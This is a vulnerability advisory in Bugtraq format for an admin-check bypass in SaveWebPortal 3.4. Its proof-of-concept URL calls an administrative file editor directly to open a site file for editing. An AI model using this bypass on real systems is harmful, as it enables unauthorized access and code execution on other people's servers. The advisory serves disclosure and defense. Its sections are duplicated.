SaveWebPortal Unauthorized Access Vulnerability
BID:14639
Info
SaveWebPortal Unauthorized Access Vulnerability
| Bugtraq ID: | 14639 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 23 2005 12:00AM |
| Updated: | Aug 23 2005 12:00AM |
| Credit: | rgod is credited with the discovery of this vulnerability. |
| Vulnerable: |
circeOS SaveWebPortal 3.4 |
| Not Vulnerable: | |
Discussion
SaveWebPortal Unauthorized Access Vulnerability
SaveWebPortal is prone to an unauthorized access vulnerability. This issue is due to a failure in the application to limit access to administrative scripts.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access and further attacks on the affected site.
SaveWebPortal is prone to an unauthorized access vulnerability. This issue is due to a failure in the application to limit access to administrative scripts.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access and further attacks on the affected site.
Exploit / POC
SaveWebPortal Unauthorized Access Vulnerability
No exploit is required.
The following explanation and proof of concept URI is available:
a user can bypass admin check, calling this url:
http://www.example.com/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source
No exploit is required.
The following explanation and proof of concept URI is available:
a user can bypass admin check, calling this url:
http://www.example.com/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source
Solution / Fix
SaveWebPortal Unauthorized Access Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
SaveWebPortal Unauthorized Access Vulnerability
References:
References: